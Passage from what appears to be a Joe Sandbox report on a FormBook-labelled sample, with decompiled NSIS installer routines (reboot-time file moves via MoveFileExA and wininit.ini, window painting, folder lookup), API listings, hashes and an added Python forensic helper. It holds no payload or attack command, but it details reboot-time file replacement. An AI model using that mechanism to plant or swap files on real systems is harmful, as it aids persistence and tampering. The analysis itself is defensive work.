                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                              • LoadCursorA.USER32 ref: 004040E2
                                                                              • SetCursor.USER32(00000000), ref: 004040EB
                                                                              • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                              • LoadCursorA.USER32 ref: 0040410B
                                                                              • SetCursor.USER32(00000000), ref: 0040410E
                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                              • String ID: N$open
                                                                              • API String ID: 3615053054-904208323
                                                                              • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                              • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                              • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                              • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 94%
			/* Decompiler output (Joe Sandbox) with explanatory comments. The logic is the NSIS installer
			   stub's "move or delete a file on reboot" routine, i.e. generic installer behaviour rather than
			   FormBook-specific code: it first tries MoveFileExA with
			   MOVEFILE_REPLACE_EXISTING | MOVEFILE_DELAY_UNTIL_REBOOT (flags = 5), which records the operation in
			   the PendingFileRenameOperations registry value, and when that fails (e.g. the export is missing on
			   Win9x) it appends a "new=existing" line to the [Rename] section of %WINDIR%\wininit.ini.
			   _a4 is the existing path; _v0 (the second argument) is the new path, or NULL to delete the file. */
			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t25;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA"); // resolve the export at run time (GetModuleHandleA/LoadLibraryA + GetProcAddress)
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5); // MoveFileExA(existing, new, MOVEFILE_REPLACE_EXISTING | MOVEFILE_DELAY_UNTIL_REBOOT)
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1; // global count of operations deferred to reboot; the installer later asks for a reboot
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e; // stores "NUL\0" as the default destination: "NUL=path" in wininit.ini means delete
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400); // wininit.ini entries use 8.3 short names
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188); // "new=existing" (or "NUL=existing"); _t42 = line length
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0); // GENERIC_READ | GENERIC_WRITE, OPEN_ALWAYS
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // room for the new line plus a "[Rename]\r\n" header (10 bytes)
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) { // _a16 is reused as the bytes-read out parameter
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							_t25 = E00405624(_t52, "[Rename]\r\n"); // locate an existing [Rename] section
							if(_t25 != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n["); // first section header after it
								if(_t27 == 0) {
									L13:
									_t28 = _t48; // no following section: the line goes at the end of the file
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42); // copy the new line into the gap
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0); // rewrite the whole file
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1; // insertion point: the "[" of the next section header
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20: // shift the rest of the file by the length of the new line to open the gap
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n"); // no section yet: append a header, then the line
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1)); // create the destination first so GetShortPathNameA can resolve it
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
                                                                              			}
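The routine above leaves two kinds of artefacts an analyst can check after the sandbox run: the PendingFileRenameOperations registry value written by MoveFileExA with MOVEFILE_DELAY_UNTIL_REBOOT, and the [Rename] section of wininit.ini used by the fallback path. The following helper is an added example, not code from the sample, from Joe Sandbox or from the NSIS project. It re-implements the wininit.ini bookkeeping of E00405707 (insert "new=existing" into [Rename], "NUL" target means delete) and decodes the registry value's REG_MULTI_SZ pairs. The value layout and the ini format are documented Windows behaviour; every path string and the sample data are constructed here.

```python
"""
Added example (not code from the analysed sample, from Joe Sandbox or from NSIS):
a small forensic helper for the two "do it on reboot" mechanisms seen in E00405707.
All inputs are constructed; the registry value layout and the wininit.ini [Rename]
format are documented Windows behaviour, the path strings are made up.
"""
from typing import List, Optional, Tuple

RENAME_SECTION = "[Rename]\r\n"
MOVEFILE_REPLACE_EXISTING = 0x1
MOVEFILE_DELAY_UNTIL_REBOOT = 0x4  # 0x1 | 0x4 == 5, the flag value in the decompiled MoveFileExA call

Op = Tuple[str, str, str]  # (action, source, destination)


def queue_wininit_rename(ini: str, src: str, dst: Optional[str]) -> str:
    """Mirror of the fallback branch: add 'dst=src' to the [Rename] section of a
    wininit.ini image, creating the section when it is missing. dst=None deletes
    the file, which wininit.ini expresses as a NUL destination."""
    line = f"{'NUL' if dst is None else dst}={src}\r\n"
    pos = ini.find(RENAME_SECTION)
    if pos < 0:
        # no section yet: append a header and the line at the end of the file
        return ini + RENAME_SECTION + line
    # section exists: insert just before the next "[...]" header, or at end of file.
    # The search starts on the header's own "\n" so a section that follows the
    # header immediately is found too (a search starting after the full header misses it).
    nxt = ini.find("\n[", pos + len(RENAME_SECTION) - 1)
    insert_at = len(ini) if nxt < 0 else nxt + 1
    return ini[:insert_at] + line + ini[insert_at:]


def parse_wininit_rename(ini: str) -> List[Op]:
    """Return (action, src, dst) for each [Rename] entry. Entries are 'dst=src';
    a dst of NUL means delete."""
    ops: List[Op] = []
    in_section = False
    for raw in ini.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[rename]"
            continue
        if in_section and "=" in line:
            dst, src = line.split("=", 1)
            ops.append(("delete" if dst.upper() == "NUL" else "move", src, dst))
    return ops


def _strip_nt_prefix(path: str) -> str:
    return path[4:] if path.startswith("\\??\\") else path


def decode_pending_file_rename_ops(blob: bytes) -> List[Op]:
    """Decode the REG_MULTI_SZ data of
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations,
    where MoveFileExA(..., MOVEFILE_DELAY_UNTIL_REBOOT) records its work.
    Strings come in (source, target) pairs; an empty target deletes the source and a
    target starting with '!' overwrites an existing file (MOVEFILE_REPLACE_EXISTING)."""
    parts = blob.decode("utf-16-le").split("\x00")
    ops: List[Op] = []
    for i in range(0, len(parts), 2):
        src = parts[i]
        if not src:  # an empty source is the list terminator
            break
        dst = parts[i + 1] if i + 1 < len(parts) else ""
        replace = dst.startswith("!")
        dst = _strip_nt_prefix(dst[1:] if replace else dst)
        action = "delete" if not dst else ("move-replace" if replace else "move")
        ops.append((action, _strip_nt_prefix(src), dst))
    return ops


def encode_pending_file_rename_ops(pairs: List[Tuple[str, str]]) -> bytes:
    """Build the REG_MULTI_SZ bytes for (source, target) pairs so the decoder can be
    exercised offline. Targets already carry their '!' and '\\??\\' decoration."""
    return ("".join(f"{s}\x00{t}\x00" for s, t in pairs) + "\x00").encode("utf-16-le")


# --- constructed sample data (hypothetical paths) ----------------------------
TMP_FILE = "C:\\Users\\user\\AppData\\Local\\Temp\\nst1234.tmp"
STAGE_SRC = "C:\\Users\\user\\AppData\\Local\\Temp\\stage.bin"
STAGE_DST = "C:\\Program Files\\App\\app.dll"

SAMPLE_PENDING = encode_pending_file_rename_ops([
    ("\\??\\" + TMP_FILE, ""),                      # delete on reboot
    ("\\??\\" + STAGE_SRC, "!\\??\\" + STAGE_DST),  # move, replacing the target
])

SAMPLE_WININIT = (
    "[Other]\r\nkey=value\r\n"
    "[Rename]\r\nNUL=C:\\TEMP\\OLDFILE.TMP\r\n"
    "[Trailer]\r\nx=y\r\n"
)


if __name__ == "__main__":
    for op in decode_pending_file_rename_ops(SAMPLE_PENDING):
        print("registry:", op)
    updated = queue_wininit_rename(SAMPLE_WININIT, "C:\\TEMP\\X.EXE", "C:\\APP\\X.EXE")
    for op in parse_wininit_rename(updated):
        print("wininit :", op)
```

On a live or mounted system the registry bytes come from the SYSTEM hive (the value is a REG_MULTI_SZ under Control\Session Manager) and wininit.ini from the Windows directory; the decoder is written against the raw bytes so it works on an offline hive export as well. Because the installer stub increments a counter and may prompt for a reboot, entries left behind in either location are the durable trace of this routine once the process itself is gone.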

                                                                              APIs
                                                                                • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                                • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                                • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                              • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                              • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                              • wsprintfA.USER32 ref: 004057A0
                                                                              • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                              • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                              • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                              • GlobalFree.KERNEL32 ref: 0040586C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                                • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                                • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                              • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                              • API String ID: 3633819597-1342836890
                                                                              • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                              • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                              • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                              • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 90%
			/* Decompiler output (Joe Sandbox) with explanatory comments. This is a window procedure
			   (hwnd, message, wParam, lParam) whose WM_PAINT handler (message 0xf) fills the client area
			   in 4-pixel horizontal bands, interpolating each colour channel between two colours kept at
			   offsets 0x50 and 0x54 of the global structure at 0x7a2f88: the NSIS background-window
			   gradient, not malware logic. The listing is cut off in the report. */
			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) { // WM_PAINT
					_t130 =  *0x7a2f88; // global window/colour settings
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000; // BS_SOLID
					_a8 = _t70; // _a8 now holds the HDC
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom; // client height
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top; // weight of the first colour for this band
						asm("cdq");
						asm("cdq");
						asm("cdq"); // one signed division per channel; only the low channel survives decompilation below
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4; // each band is 4 pixels high
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
                                                                              						DeleteObject(_a16);
                                                                              						_v32.top = _v32.top + 4;
                                                                              					}
                                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                              						_a16 = _t94;
                                                                              						if(_t94 != 0) {
                                                                              							_t128 = _a8;
                                                                              							_v32.left = 0x10;
                                                                              							_v32.top = 8;
                                                                              							SetBkMode(_t128, 1);
                                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                              							_a8 = SelectObject(_t128, _a16);
                                                                              							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                                                              							SelectObject(_t128, _a8);
                                                                              							DeleteObject(_a16);
                                                                              						}
                                                                              					}
                                                                              					EndPaint(_a4,  &_v96);
                                                                              					return 0;
                                                                              				}
                                                                              				_t102 = _a16;
                                                                              				if(_a8 == 0x46) {
                                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                              					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                                                              				}
                                                                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                              			}

                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                              • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                              • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                              • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 88%
                                                                              			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                              				struct _ITEMIDLIST* _v8;
                                                                              				char _v12;
                                                                              				signed int _v16;
                                                                              				signed int _v20;
                                                                              				signed int _v24;
                                                                              				signed int _v28;
                                                                              				CHAR* _t35;
                                                                              				signed int _t37;
                                                                              				signed int _t38;
                                                                              				signed int _t49;
                                                                              				char _t51;
                                                                              				signed int _t61;
                                                                              				char* _t62;
                                                                              				char _t67;
                                                                              				signed int _t69;
                                                                              				CHAR* _t79;
                                                                              				signed int _t86;
                                                                              				signed int _t88;
                                                                              				void* _t89;
                                                                              
                                                                              				_t61 = _a8;
                                                                              				if(_t61 < 0) {
                                                                              					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                                                              				}
                                                                              				_t62 = _t61 +  *0x7a2fb8;
                                                                              				_t35 = 0x7a1f20;
                                                                              				_t79 = 0x7a1f20;
                                                                              				if(_a4 - 0x7a1f20 < 0x800) {
                                                                              					_t79 = _a4;
                                                                              					_a4 = _a4 & 0x00000000;
                                                                              				}
                                                                              				while(1) {
                                                                              					_t67 =  *_t62;
                                                                              					_a11 = _t67;
                                                                              					if(_t67 == 0) {
                                                                              						break;
                                                                              					}
                                                                              					__eflags = _t79 - _t35 - 0x400;
                                                                              					if(_t79 - _t35 >= 0x400) {
                                                                              						break;
                                                                              					}
                                                                              					_t62 = _t62 + 1;
                                                                              					__eflags = _t67 - 0xfc;
                                                                              					if(__eflags <= 0) {
                                                                              						if(__eflags != 0) {
                                                                              							 *_t79 = _t67;
                                                                              							_t79 =  &(_t79[1]);
                                                                              							__eflags = _t79;
                                                                              						} else {
                                                                              							 *_t79 =  *_t62;
                                                                              							_t79 =  &(_t79[1]);
                                                                              							_t62 = _t62 + 1;
                                                                              						}
                                                                              						continue;
                                                                              					}
                                                                              					_t37 =  *((char*)(_t62 + 1));
                                                                              					_t69 =  *_t62;
                                                                              					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                                                              					_v28 = _t69;
                                                                              					_v20 = _t37;
                                                                              					_t70 = _t69 | 0x00008000;
                                                                              					_t38 = _t37 | 0x00008000;
                                                                              					_v24 = _t69 | 0x00008000;
                                                                              					_t62 = _t62 + 2;
                                                                              					__eflags = _a11 - 0xfe;
                                                                              					_v16 = _t38;
                                                                              					if(_a11 != 0xfe) {
                                                                              						__eflags = _a11 - 0xfd;
                                                                              						if(_a11 != 0xfd) {
                                                                              							__eflags = _a11 - 0xff;
                                                                              							if(_a11 == 0xff) {
                                                                              								__eflags = (_t38 | 0xffffffff) - _t86;
                                                                              								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                                                              							}
                                                                              							L38:
                                                                              							_t79 =  &(_t79[lstrlenA(_t79)]);
                                                                              							_t35 = 0x7a1f20;
                                                                              							continue;
                                                                              						}
                                                                              						__eflags = _t86 - 0x1b;
                                                                              						if(_t86 != 0x1b) {
                                                                              							__eflags = (_t86 << 0xa) + 0x7a4000;
                                                                              							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                                                              						} else {
                                                                              							E0040591D(_t79,  *0x7a2f84);
                                                                              						}
                                                                              						__eflags = _t86 + 0xffffffeb - 6;
                                                                              						if(_t86 + 0xffffffeb < 6) {
                                                                              							L29:
                                                                              							E00405BFB(_t79);
                                                                              						}
                                                                              						goto L38;
                                                                              					}
                                                                              					_a8 = _a8 & 0x00000000;
                                                                              					 *_t79 =  *_t79 & 0x00000000;
                                                                              					_t88 = 4;
                                                                              					__eflags = _v20 - _t88;
                                                                              					if(_v20 != _t88) {
                                                                              						_t49 = _v28;
                                                                              						__eflags = _t49 - 0x2b;
                                                                              						if(_t49 != 0x2b) {
                                                                              							__eflags = _t49 - 0x26;
                                                                              							if(_t49 != 0x26) {
                                                                              								__eflags = _t49 - 0x25;
                                                                              								if(_t49 != 0x25) {
                                                                              									__eflags = _t49 - 0x24;
                                                                              									if(_t49 != 0x24) {
                                                                              										goto L19;
                                                                              									}
                                                                              									GetWindowsDirectoryA(_t79, 0x400);
                                                                              									goto L18;
                                                                              								}
                                                                              								GetSystemDirectoryA(_t79, 0x400);
                                                                              								goto L18;
                                                                              							}
                                                                              							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                                                              							__eflags =  *_t79;
                                                                              							if( *_t79 != 0) {
                                                                              								goto L29;
                                                                              							}
                                                                              							E004059BF(_t79, "C:\\Program Files");
                                                                              							goto L18;
                                                                              						} else {
                                                                              							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                                                              							L18:
                                                                              							__eflags =  *_t79;
                                                                              							if( *_t79 != 0) {
                                                                              								goto L29;
                                                                              							}
                                                                              							goto L19;
                                                                              						}
                                                                              					} else {
                                                                              						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                                                              						L19:
                                                                              						__eflags =  *0x7a3004;
                                                                              						if( *0x7a3004 == 0) {
                                                                              							_t88 = 2;
                                                                              						}
                                                                              						do {
                                                                              							_t88 = _t88 - 1;
                                                                              							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                                                              							__eflags = _t51;
                                                                              							if(_t51 != 0) {
                                                                              								 *_t79 =  *_t79 & 0x00000000;
                                                                              								__eflags =  *_t79;
                                                                              								goto L25;
                                                                              							}
                                                                              							__imp__SHGetPathFromIDListA(_v8, _t79);
                                                                              							_v12 = _t51;
                                                                              							E0040521C(_t70, _v8);
                                                                              							__eflags = _v12;
                                                                              							if(_v12 != 0) {
                                                                              								break;
                                                                              							}
                                                                              							L25:
                                                                              							__eflags = _t88;
                                                                              						} while (_t88 != 0);
                                                                              						__eflags =  *_t79;
                                                                              						if( *_t79 != 0) {
                                                                              							__eflags = _a8;
                                                                              							if(_a8 != 0) {
                                                                              								lstrcatA(_t79, _a8);
                                                                              							}
                                                                              						}
                                                                              						goto L29;
                                                                              					}
                                                                              				}
                                                                              				 *_t79 =  *_t79 & 0x00000000;
                                                                              				if(_a4 == 0) {
                                                                              					return _t35;
                                                                              				}
                                                                              				return E004059BF(_a4, _t35);
                                                                              			}

                                                                              APIs
                                                                              • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                              • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                              • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                              • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078EF38,00789938), ref: 00405BBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                              • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 4227507514-3711765563
                                                                              • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                              • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                              • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                              • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 32%
                                                                              			E004026FA() {
                                                                              				void* _t23;
                                                                              				void* _t28;
                                                                              				long _t33;
                                                                              				struct _OVERLAPPED* _t48;
                                                                              				void* _t51;
                                                                              				void* _t53;
                                                                              				void* _t54;
                                                                              				CHAR* _t55;
                                                                              				void* _t58;
                                                                              				void* _t59;
                                                                              				void* _t60;
                                                                              
